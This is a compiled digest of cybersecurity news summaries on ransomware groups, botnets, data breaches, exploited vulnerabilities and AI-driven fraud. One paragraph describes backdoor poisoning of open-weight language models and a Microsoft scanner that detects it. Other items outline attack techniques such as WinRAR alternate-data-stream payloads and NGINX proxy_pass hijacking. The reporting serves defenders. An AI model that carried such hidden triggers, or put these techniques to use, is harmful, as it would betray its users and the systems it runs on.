Ransomware operators are exploiting virtual machines (VMs) provisioned by ISPsystem's VMmanager to host and deliver malicious payloads at scale. Researchers at Sophos observed this tactic during investigations into 'WantToCry' ransomware incidents, noting that attackers used Windows VMs with identical hostnames, suggesting default templates generated by VMmanager. The same hostnames were found in the infrastructure of multiple ransomware groups, including LockBit, Qilin, Conti, BlackCat/ALPHV, and Ursnif, as well as various malware campaigns involving RedLine and Lummar info-stealers. ISPsystem's VMmanager platform allows malicious actors to spin up VMs for command-and-control (C2) and payload-delivery infrastructure, hiding malicious systems among thousands of innocuous ones. This complicates attribution and makes quick takedowns unlikely. The majority of the malicious VMs were hosted by a small cluster of providers with a bad reputation or sanctions, including Stark Industries Solutions Ltd., Zomro B.V., First Server Limited, Partner Hosting LTD, and JSC IOT.

Microsoft plans to retire Exchange Web Services (EWS) for Exchange Online by April 2027, beginning with a phased disablement starting October 2026. EWS, a cross-platform API for accessing Exchange mailbox items, will no longer be supported in Exchange Online but will remain functional in on-premises Exchange Server installations. Administrators can manage the transition via an application allowlist, and Microsoft will conduct 'scream tests' to identify hidden dependencies. Developers are advised to migrate to the Microsoft Graph API, which offers near-complete feature parity with EWS.

The **Aisuru/Kimwolf botnet ecosystem** has escalated its global threat, now conducting **record-breaking DDoS campaigns**—including a **31.4 Tbps attack in November 2025** and a **holiday-themed "The Night Before Christmas" campaign** (December 19, 2025) with peaks of **24 Tbps, 9 Bpps, and 205 Mrps**. This follows the **29.7 Tbps assault in Q3 2025** and **disruption of the IPIDEA proxy network** (January 2026), which had enabled the botnets’ **lateral movement into government, healthcare, and critical infrastructure networks** via **33,000+ compromised endpoints** in universities and **8,000 in U.S./foreign government systems**. With **over 6 million infected devices** (1–4M IoT for Aisuru; **>2M Android TVs/boxes** for Kimwolf), the botnets now blend **hyper-volumetric DDoS** with **residential proxy monetization**, targeting sectors beyond gaming to include **telecom, IT, finance, and AI companies**. Cloudflare reported **47.1 million DDoS attacks mitigated in 2025** (100% YoY increase), with **hyper-volumetric incidents surging 40% QoQ in Q4**—highlighting the botnets’ **rapid evolution in scale, sophistication, and cross-sector impact**. Despite **Google’s January 2026 takedown of IPIDEA** (reducing proxy devices by millions), persistent infections and **new attack vectors** (e.g., **trojanized apps, ENS-based C2**) underscore the ongoing systemic risk to **global internet stability and enterprise security**.

Rome’s La Sapienza University suffered a cyberattack that disrupted its IT systems, causing widespread operational disruptions. The university shut down its network systems as a precautionary measure to ensure data integrity and security. The attack is suspected to be ransomware, attributed to the pro-Russian threat actor Femwar02, with similarities to the Bablock/Rorschach ransomware strain. The university is working with Italian cybersecurity authorities to restore systems from backups. The university has not disclosed the ransom amount, but the risk of data leakage remains significant. Students and staff are advised to remain vigilant against phishing attacks.

The Qilin ransomware group has been active, targeting multiple organizations, including Inotiv, a U.S.-based pharmaceutical company, Creative Box Inc. (CBI), a subsidiary of Nissan, Mecklenburg County Public Schools (MCPS), Asahi Group, Synnovis, a UK pathology services provider, and Conpet, Romania's national oil pipeline operator. The latest attack was on Conpet, where Qilin claims to have stolen nearly 1TB of documents and leaked over a dozen photos of internal documents containing financial information and passport scans as proof of the breach. The attack caused significant operational disruption, including the temporary takedown of the company's website. The group has also targeted other Japanese companies, including Shinko Plastics and Osaki Medical. The Qilin ransomware group operates as a ransomware-as-a-service (RaaS) network, providing tools and infrastructure to affiliates and taking a 15–20% share of ransom payments. The group's malware is custom-built in Rust and C for cross-platform attacks, including Windows, Linux, and ESXi systems. The Qilin ransomware operation was first launched as "Agenda" in August 2022 and rebranded to Qilin by September 2022. Qilin ransomware operation has attacked more than 700 victims across 62 countries in 2025. The Qilin ransomware operation has published over 40 new victims per month in the second half of 2025. The Qilin ransomware operation uses the Windows Subsystem for Linux (WSL) to execute Linux encryptors on Windows systems, evading traditional security tools. Qilin ransomware group has been observed exploiting unpatched VPN appliances and lack of multi-factor authentication (MFA) to gain initial access to corporate networks. Qilin ransomware group has been observed targeting small-to-medium-sized businesses in the construction, healthcare, and financial sectors. Qilin ransomware group has been observed using new extortion channels, including Telegram and public sites such as WikiLeaksV2. Qilin ransomware group has been observed collaborating with affiliates of the Scattered Spider group. Qilin ransomware group has been observed operating as a ransomware-as-a-service (RaaS) group since 2023, leasing its tools and infrastructure to affiliates. Qilin ransomware group has been observed publishing victims' data on dark-web leak sites if no ransom is paid. Asahi Group Holdings confirmed that the personal data of approximately 1.914 million individuals, including 1.525 million customers, was or may have been exposed in the cyber-attack. The exposed data includes names, genders, dates of birth, postal addresses, email addresses, and phone numbers. Asahi Group Holdings spent two months investigating the breach, conducting root cause analysis, integrity checks, containing the ransomware, restoring systems, and strengthening security. Atsushi Katsuki, President and Group CEO of Asahi Group Holdings, publicly apologized for the difficulties caused by the disruptions. Asahi Group Holdings is reviewing the potential impact of the incident on its financial results for fiscal year 2025. The Qilin ransomware group claimed responsibility for the cyber-attack on Asahi Group Holdings. Asahi Group Holdings temporarily suspended its operations in Japan in late September following a system failure due to the ransomware attack. The disruptions included order and shipment operations, call centers, and customer service desks. Asahi Group Holdings postponed the launch of a new product scheduled to be released in October due to the cyber-attack. On October 7, the Qilin ransomware group listed Asahi on its data leak site, claiming to have stolen 27 GB of files from the company. Inotiv is notifying 9,542 individuals that their personal information was stolen in the August 2025 ransomware attack. Inotiv has restored availability and access to impacted networks and systems affected by the August 2025 ransomware attack. The Qilin ransomware group claimed responsibility for the breach in August 2025, leaked data samples, and said they exfiltrated over 162,000 files totaling 176 GB from Inotiv. Asahi Group Holdings is considering the creation of a dedicated cybersecurity unit within the group. Asahi Group Holdings is scrapping the use of virtual private networks (VPNs) and is adopting a stricter zero-trust model. Asahi Group Holdings has postponed the disclosure of sales performance for its operating due to the ongoing effects of the cyber-attack on its systems. Asahi Group Holdings recorded a 20% year-on-year drop in alcohol sales in Japan in November 2025 due to the cyber-attack. Asahi Group Holdings has refrained from releasing monthly sales data by category and brand due to the ongoing effects of the cyber-attack on its systems. November marks the third consecutive month Asahi Group Holdings has skipped disclosures of sales data, citing difficulties in accurately compiling the figures.

Cloud migrations introduce security blind spots due to dynamic infrastructure and overlapping APIs, necessitating real-time visibility for effective cyber defense. Network-layer telemetry provides consistent, provider-agnostic signals for detection and investigation, overcoming the challenges of cloud log standardization. Adversaries exploit cloud environments through supply-chain compromises, infostealer-led intrusions, and misuse of managed services, highlighting the need for comprehensive network monitoring. Effective cloud security involves monitoring east-west and north-south traffic, container traffic, TLS metadata, DNS data, and flow logs. Establishing baselines, alerting on anomalies, and continuous validation are key steps in maintaining robust cloud security.

Researchers at Orca Security discovered multiple attack vectors in GitHub Codespaces that allow remote code execution (RCE) by exploiting default behaviors in cloud-based development environments. These vulnerabilities enable attackers to execute arbitrary commands, steal credentials, and access sensitive resources without explicit user approval. The issue arises from the automatic execution of repository-defined configuration files, which can be manipulated to trigger malicious activities upon environment startup or when checking out a pull request.

A report from Cellebrite reveals that smartphones are now a key source of digital evidence in nearly all police investigations. The 2026 Industry Trends Report, based on interviews with 1200 law enforcement practitioners, shows a significant increase in the reliance on digital evidence, with 95% agreeing it is crucial for solving cases. Smartphones are cited as the top source of digital evidence, and agencies are reallocating resources to digital investigations. However, the complexity of digital evidence and challenges such as locked devices and training gaps are increasing workloads.

Recent cyber threat intelligence highlights a trend toward operational efficiency in attacker techniques. Intrusions are starting from ordinary workflows and tools, with attackers industrializing their operations through shared infrastructure, repeatable playbooks, and affiliate-style ecosystems. The focus is on reducing time between access and impact, leveraging automation, and exploiting known security gaps rather than unknown threats.

Substack has notified users of a data breach that occurred in October 2025, during which attackers stole email addresses and phone numbers. The breach was discovered in February 2026. The platform assured users that no credentials or financial information were accessed. A threat actor later leaked a database containing 697,313 records on BreachForums, claiming the data was scraped. Substack has patched the vulnerability and warned users about potential phishing attempts. Substack has a history of privacy incidents, including a 2020 email exposure. The platform has grown significantly since its launch in 2017, reaching five million paid subscriptions by March 2025.

Amaranth-Dragon, a China-linked threat actor, has conducted targeted espionage campaigns against government and law enforcement agencies in Southeast Asia throughout 2025. The group exploited CVE-2025-8088, a WinRAR vulnerability, to deliver malicious payloads, including the Havoc C2 framework and TGAmaranth RAT. The campaigns were timed to coincide with sensitive political and security events, demonstrating a high degree of stealth and operational discipline. The group's tactics, tools, and procedures (TTPs) show strong links to APT41, suggesting a shared ecosystem or resource pool. The attackers leveraged the vulnerability within days of its disclosure in August 2025 and used the Havoc Framework as the Command and Control (C&C) platform.

The rapid proliferation of AI tools in enterprise environments has outpaced traditional security controls, creating a governance gap. AI Usage Control (AUC) has emerged as a new category to address this gap by focusing on real-time interaction governance rather than legacy tool-centric approaches. Enterprises are encouraged to adopt AUC to manage AI risks effectively, ensuring visibility and control over AI interactions across various platforms and tools.

A data breach at Betterment, a fintech firm managing $65 billion in assets, exposed personal information of 1.4 million accounts. The breach, occurring in January 2026, involved stolen email addresses, names, geographic data, dates of birth, physical addresses, phone numbers, device information, and employment details. The attackers also sent fraudulent emails attempting to lure customers into a cryptocurrency scam. Betterment confirmed no customer accounts or login information were compromised, but the breach included significant contact information.

The Iranian APT group Infy (Prince of Persia) has resumed activity after years of silence, targeting victims in Iran, Iraq, Turkey, India, Canada, and Europe. The group has updated its malware tools Foudre and Tonnerre, employing new techniques such as domain generation algorithms (DGA) and Telegram for command-and-control (C2) communication. The campaign highlights the group's continued relevance and sophistication in cyber espionage. The latest findings reveal that Infy has been active since at least 2004, leveraging malware like Foudre and Tonnerre to profile and exfiltrate data from high-value machines. The group's recent activities include using updated versions of Foudre (version 34) and Tonnerre (versions 12-18, 50), with the latest Tonnerre version detected in September 2025. Infy stopped maintaining its C2 servers on January 8, 2026, coinciding with an internet blackout in Iran, and resumed activity on January 26, 2026, setting up new C2 servers the day before internet restrictions were relaxed. The group has introduced Tornado version 51, which uses both HTTP and Telegram for C2 communication, and has weaponized a 1-day security flaw in WinRAR to extract the Tornado payload on a compromised host. Additionally, Infy has used a malicious ZIP file to drop ZZ Stealer, which loads a custom variant of the StormKitty infostealer, and there is a strong correlation between the ZZ Stealer attack chain and a campaign targeting the Python Package Index (PyPI) repository.

Cybercriminals have exploited lax authentication settings in Zendesk to flood targeted email inboxes with spam messages. The attacks use hundreds of Zendesk corporate customers simultaneously, sending notifications from customer domain names. Zendesk acknowledged the issue and is investigating additional preventive measures. The abuse involves sending ticket creation notifications from customer accounts that allow anonymous submissions. This allows attackers to create support tickets with any chosen subject line, including menacing or insulting messages. The notifications appear to come from legitimate customer domains, making them harder to filter out. The spam wave started on January 18th, 2026, with victims reporting receiving hundreds of emails. Companies impacted include Discord, Tinder, Riot Games, Dropbox, CD Projekt (2k.com), Maya Mobile, NordVPN, Tennessee Department of Labor, Tennessee Department of Revenue, Lightspeed, CTL, Kahoot, Headspace, and Lime. Zendesk has introduced new safety features to detect and stop this type of spam in the future. A fresh wave of spam hit inboxes worldwide on February 4th, 2026, with users reporting being bombarded by automated emails generated through companies' unsecured Zendesk support systems. The emails had subject lines such as 'Activate your account' and similar support-style notifications appearing to originate from different companies.

Fraudsters significantly increased the use of AI to enhance campaigns across voice and virtual meeting channels in 2025, leading to a 1210% rise in AI-enabled fraud compared to a 195% surge in traditional fraud. The fraud tactics, including deepfakes, voice bots, and AI-generated interactions, are cheaper, faster, harder to detect, and more scalable. These methods are now being used in various real-time interactions, from remote job interviews to financial transactions, posing a significant challenge for enterprises. The report highlights that voice fraud often begins with automated bots performing reconnaissance on IVR systems, mapping menu options, and identifying security weak points. Later, these bots return with knowledge about processes and workflows to execute more effective fraud attempts. In enterprise settings, AI is also used to deploy deepfakes of C-suite executives in virtual meetings to trick employees into wiring funds to fraudsters. Healthcare and retail sectors are particularly vulnerable, with bots using intel from IVR probing to socially engineer live agents into enabling account takeovers. In retail, AI-powered return fraud is a growing threat, targeting low-dollar refunds that stay below review thresholds, leading to material losses when bots run continuously.

Multiple critical vulnerabilities in the n8n workflow automation platform continue to pose severe risks, with the latest flaw, **CVE-2026-25049 (CVSS 9.4)**, enabling authenticated users to execute arbitrary system commands via malicious workflows. This vulnerability bypasses earlier patches for CVE-2025-68613 and stems from inadequate sanitization in n8n’s expression evaluation, allowing attackers to exploit TypeScript’s compile-time type system mismatches with JavaScript’s runtime behavior. Successful exploitation can lead to server compromise, credential theft, and persistent backdoor installation, with heightened risk when paired with n8n’s public webhook feature. The vulnerabilities collectively affect over **105,000 exposed instances**, primarily in the U.S. and Europe, and impact both self-hosted and cloud deployments. Earlier flaws—including **CVE-2026-21877 (CVSS 10.0)**, **CVE-2026-21858 (CVSS 10.0)**, and sandbox escape vulnerabilities **CVE-2026-1470 (CVSS 9.9)** and **CVE-2026-0863 (CVSS 8.5)**—have already demonstrated the potential for full server takeover, AI workflow hijacking, and exposure of sensitive credentials (API keys, OAuth tokens, database passwords). Patches are available in versions **1.123.17, 2.4.5, 2.5.1, and 2.5.2**, but unpatched systems remain at critical risk. Users are urged to **upgrade immediately**, restrict workflow permissions, and harden deployment environments to mitigate exposure.

Threat actors are exploiting the React2Shell vulnerability (CVE-2025-55182) in NGINX servers to hijack web traffic. The campaign targets Asian TLDs, Chinese hosting infrastructure, and government/educational domains. Malicious NGINX configurations redirect traffic through attacker-controlled servers. The attack involves a multi-stage toolkit with scripts for persistence and traffic redirection. Two IP addresses account for 56% of exploitation attempts, with distinct post-exploitation payloads observed. Additionally, a coordinated reconnaissance campaign targeting Citrix ADC Gateway and Netscaler Gateway infrastructure was discovered, using residential proxies and an Azure IP address.

A threat actor is compromising NGINX servers to hijack and redirect user traffic through attacker-controlled infrastructure. The campaign targets NGINX installations and Baota hosting management panels, particularly affecting sites with Asian top-level domains and government/educational sites. The attackers modify NGINX configuration files to inject malicious 'location' blocks, rerouting traffic via the 'proxy_pass' directive to attacker-controlled domains. The attack uses a multi-stage toolkit to perform these injections, making the traffic appear legitimate by preserving request headers. The campaign is difficult to detect as it does not exploit an NGINX vulnerability but instead hides malicious instructions in configuration files, which are rarely scrutinized. User traffic still reaches its intended destination, often directly, making the attack less noticeable without specific monitoring.

DragonForce, a Conti-derived ransomware operation, has evolved into a cartel-like structure, recruiting affiliates and partnering with Scattered Spider for sophisticated attacks. The group exploits vulnerable drivers to deactivate security programs and has intensified its operations, publishing details of more compromised entities. DragonForce offers affiliates 80% of profits, customizable encryptors, and infrastructure, lowering the barrier to entry for new cybercriminals. The group's partnership with Scattered Spider has enabled high-profile breaches, including the Marks & Spencer incident. DragonForce has also proposed cooperation among major ransomware operations to stabilize the market and increase collective profits. Security experts advise robust backup practices, network segmentation, and consistent patching to defend against such threats.

Threat actors are exploiting Windows screensaver files (.scr) in spear-phishing campaigns to bypass security defenses and deploy remote monitoring and management (RMM) tools, granting them interactive remote control over compromised systems. The attack involves luring users into downloading and executing screensaver files hosted on cloud storage platforms, which then install legitimate RMM tools like JWrapper for persistent access. This technique allows attackers to maintain a foothold within the environment, facilitating data theft, lateral movement, and ransomware deployment. The campaign has been observed across multiple organizations, but the threat actors remain unidentified due to the use of consumer cloud storage and lack of consistent infrastructure.

Microsoft has developed a lightweight scanner designed to detect backdoors in open-weight large language models (LLMs). The scanner identifies three key signals to flag backdoors while maintaining a low false positive rate. The tool can detect model poisoning, where threat actors embed hidden behaviors into the model's weights during training, causing unintended actions upon trigger detection. The scanner works by analyzing memorized content and attention patterns in LLMs without requiring additional training or prior knowledge of backdoor behavior. The scanner is part of Microsoft's broader initiative to address AI-specific security concerns, including prompt injections and data poisoning, as part of its Secure Development Lifecycle (SDL).

CISA has confirmed that ransomware gangs are now exploiting a high-severity VMware ESXi sandbox escape vulnerability (CVE-2025-22225), which was previously used in zero-day attacks. The flaw allows privileged attackers within the VMX process to perform arbitrary kernel writes, leading to a sandbox escape. Broadcom patched this vulnerability in March 2025, but it has since been leveraged in ransomware campaigns. The vulnerability affects multiple VMware products, including ESXi, Fusion, Cloud Foundation, vSphere, Workstation, and Telco Cloud Platform.

Threat actors are exploiting commercial virtual private server (VPS) infrastructure to quickly and discreetly set up attack infrastructure. This tactic has been observed in coordinated SaaS account compromises across multiple customer environments. VPSs are favored due to their low cost, rapid deployment, and minimal open-source intelligence footprints. The abuse of VPS infrastructure has increased in SaaS-targeted campaigns, enabling attackers to bypass geolocation-based defenses and evade IP reputation checks. The SystemBC proxy botnet operators maintain an average of 1,500 bots daily, exploiting vulnerable commercial VPS infrastructure. This network has been active since at least 2019 and is used by various threat actors, including ransomware gangs, to deliver payloads. The use of VPS infrastructure allows attackers to mimic local traffic, blend into legitimate behavior, and rapidly deploy attack infrastructure, making detection and tracking more challenging. The SystemBC network is built for volume with little concern for stealth, and it powers other criminal proxy networks. It has over 80 command-and-control (C2) servers and fuels other proxy network services, including REM Proxy and a Vietnamese-based proxy network called VN5Socks or Shopsocks5. Nearly 80% of the SystemBC network consists of compromised VPS systems from multiple large commercial providers, with infected VPS systems having multiple easy-to-exploit vulnerabilities, with an average of 20 unpatched security issues and at least one critical-severity vulnerability. REM Proxy is a sizeable network, which also markets a pool of 20,000 Mikrotik routers and a variety of open proxies it finds freely available online. The SystemBC botnet comprises over 80 C2 servers and a daily average of 1,500 victims, of which nearly 80% are compromised virtual private server (VPS) systems from several large commercial providers. Close to 40% of the compromises have "extremely long average" infection lifespans, lasting over 31 days. The vast majority of the victimized servers have been found to be susceptible to several known security flaws. Each victim has 20 unpatched CVEs and at least one critical CVE on average, with one of the identified VPS servers in the U.S. city of Atlanta vulnerable to more than 160 unpatched CVEs. The IP address 104.250.164[.]214 hosts the artifacts and appears to be the source of attacks to recruit potential victims. SystemBC is used to brute-force WordPress site credentials, which are likely sold to brokers for malicious code injection. SystemBC has exhibited sustained activity and operational resilience across multiple years, establishing itself as a persistent vector within the cyber threat landscape. SystemBC has been linked to more than 10,000 infected IP addresses worldwide, including systems associated with sensitive government infrastructure. The malware, also known as Coroxy or DroxiDat, turns compromised systems into SOCKS5 relays, allowing threat actors to route malicious traffic through victim machines. Infections have been observed deploying additional malware, expanding the scope of compromise. Silent Push analysts developed a SystemBC-specific tracking fingerprint to identify infections and supporting infrastructure at scale. The infections were globally distributed, with the highest concentration in the US, followed by Germany, France, Singapore, and India. Many affected systems were hosted within data center environments, helping infections persist for weeks or months. A previously undocumented SystemBC variant written in Perl was discovered, targeting Linux systems with no detections across 62 antivirus engines. SystemBC C2 infrastructure frequently relies on abuse-tolerant, bulletproof hosting providers, including BTHoster and AS213790 (BTCloud). Over 10,340 victim IP addresses were identified within a single hosting cluster, with infections lasting an average of 38 days and some persisting for more than 100 days. Compromised IP addresses used to host official government websites in Burkina Faso and Vietnam were found within the dataset. SystemBC activity often appears early in intrusion chains and frequently precedes ransomware deployment.

CISA has added multiple vulnerabilities to its KEV catalog due to active exploitation. The flaws affect Citrix Session Recording, Git, and Citrix NetScaler ADC and NetScaler Gateway. The Citrix Session Recording vulnerabilities were patched in November 2024, the Git flaw (CVE-2025-48384) was addressed in July 2025, and the NetScaler vulnerabilities were patched in August 2025. Additionally, CISA has added a five-year-old GitLab vulnerability (CVE-2021-39935) to its KEV catalog, which is actively being exploited in attacks. Federal agencies must apply mitigations by September 15, 2025, for the earlier vulnerabilities and within 48 hours for the NetScaler vulnerabilities, and by February 24, 2026, for the GitLab vulnerability. The vulnerabilities are CVE-2024-8068, CVE-2024-8069, CVE-2025-48384, CVE-2025-7775, CVE-2025-7776, and CVE-2025-8424. The first two affect Citrix Session Recording, the third affects Git, and the last three affect Citrix NetScaler ADC and NetScaler Gateway. CVE-2025-48384 is an arbitrary file write vulnerability in Git due to inconsistent handling of carriage return characters in configuration files. The vulnerability affects macOS and Linux systems, with Windows systems being immune due to differences in control character usage. The flaw was resolved in Git versions 2.43.7, 2.44.4, 2.45.4, 2.46.4, 2.47.3, 2.48.2, 2.49.1, and 2.50.1. The vulnerability impacts software developers using Git on workstations and CI/CD build systems. CVE-2021-39935 is a server-side request forgery (SSRF) flaw in GitLab that allows unauthenticated attackers to access the CI Lint API. The vulnerability affects GitLab CE/EE versions starting from 10.5 before 14.3.6, all versions starting from 14.4 before 14.4.4, and all versions starting from 14.5 before 14.5.2. GitLab patched the flaw in December 2021. CISA added the flaw to its KEV catalog on February 4, 2026, mandating federal agencies to patch it by February 24, 2026. CVE-2025-7775 is a memory overflow vulnerability leading to remote code execution and/or denial-of-service. CVE-2025-7776 is a memory overflow vulnerability leading to unpredictable behavior and denial-of-service. CVE-2025-8424 is an improper access control vulnerability in the NetScaler Management Interface. CVE-2025-7775 has been actively exploited in the wild and was added to the CISA KEV catalog on August 26, 2025, requiring federal agencies to remediate within 48 hours. The vulnerabilities affect both supported and unsupported, end-of-life versions of Citrix NetScaler ADC and NetScaler Gateway. Nearly 20% of NetScaler assets identified are on unsupported versions, primarily in North America and the APAC region. The vulnerabilities affect similar components in NetScaler ADC and NetScaler Gateway as the CitrixBleed and CitrixBleed2 vulnerabilities.

Flare researchers discovered over 10,000 Docker Hub container images leaking production API keys, cloud tokens, CI/CD credentials, and AI model access tokens. These non-human identities (NHIs), which authenticate applications and automated services, often have broad privileges and indefinite lifespans. The exposures highlight systemic issues in credential governance and automated secret detection, with real-world incidents like the Snowflake breach and Home Depot's year-long exposure demonstrating the risks of unmanaged NHIs.

ShadowSyndicate, a cybercrime cluster linked to multiple ransomware groups, has expanded its infrastructure. Researchers identified new technical markers, including reused SSH fingerprints, that connect dozens of servers to the same operator. The group has been active since 2023 and maintains a consistent infrastructure pattern. New SSH fingerprints and server transfers between internal clusters were observed, linking previously known servers to newly deployed infrastructure. The group uses commercial red-team frameworks and open-source post-exploitation tools, with ties to ransomware groups like Cl0p, ALPHV/BlackCat, and Ryuk. Group-IB recommends monitoring IoCs, autonomous systems, and unusual login activities to defend against this threat.

A custom EDR killer tool has been observed using a revoked but still valid EnCase kernel driver to disable 59 security tools. The attack involved breaching a network via compromised SonicWall SSL VPN credentials and exploiting the lack of multi-factor authentication (MFA). The tool terminates security processes using the driver's kernel-mode IOCTL interface, bypassing Windows protections like Protected Process Light (PPL). The intrusion is suspected to be related to ransomware activity, though the final payload was not deployed.

A path traversal vulnerability in WinRAR (CVE-2025-8088, CVSS 8.8) is being actively exploited in the wild. The flaw allows arbitrary code execution by crafting malicious archive files. The vulnerability affects Windows versions of WinRAR, RAR, UnRAR, portable UnRAR source code, and UnRAR.dll. The issue was discovered by researchers from ESET and addressed in WinRAR version 7.13, released on July 30, 2025. Multiple threat actors, including Paper Werewolf, RomCom, UNC4895, APT44, TEMP.Armageddon, Turla, and China-linked actors, have exploited this vulnerability to target various organizations. A new threat actor called Amaranth Dragon, linked to APT41 state-sponsored Chinese operations, has also exploited the CVE-2025-8088 vulnerability in espionage attacks on government and law enforcement agencies in Singapore, Thailand, Indonesia, Cambodia, Laos, and the Philippines. The attacks involve phishing emails with malicious archives that, when opened, exploit the vulnerability to write files outside the intended directory and achieve code execution. The payloads include a .NET loader that sends system information to an external server and receives additional malware. Financially motivated actors are also exploiting the flaw to distribute commodity remote access tools and information stealers. Google Threat Intelligence Group (GTIG) revealed that multiple threat actors, including nation-state adversaries and financially motivated groups, are exploiting the WinRAR vulnerability CVE-2025-8088. The exploit chain often involves concealing the malicious file within the alternate data streams (ADS) of a decoy file inside the archive, causing the payload to be extracted to a specific path (e.g., the Windows Startup folder) and automatically executing it once the user logs in to the machine after a restart.

Phishing attacks detected in 2025 increased more than double compared to 2024, with one email caught every 19 seconds. AI technology is enabling threat actors to generate, test, and deploy phishing campaigns at scale, resulting in faster, more adaptive, and convincing attacks. The rise includes polymorphic, multi-channel campaigns that continuously change their appearance while maintaining malicious intent. AI is helping threat actors compose emails in near-flawless local languages, contributing to a 18% rise in conversational phishing emails. Other trends include highly personalized campaigns, polymorphism by default, and a surge in the use of remote access tools (RATs). The .es TLD saw a 19-fold increase in use for credential phishing, making it the third-most abused domain. The report also noted a 204% increase in phishing emails delivering malware in 2025 compared to 2024.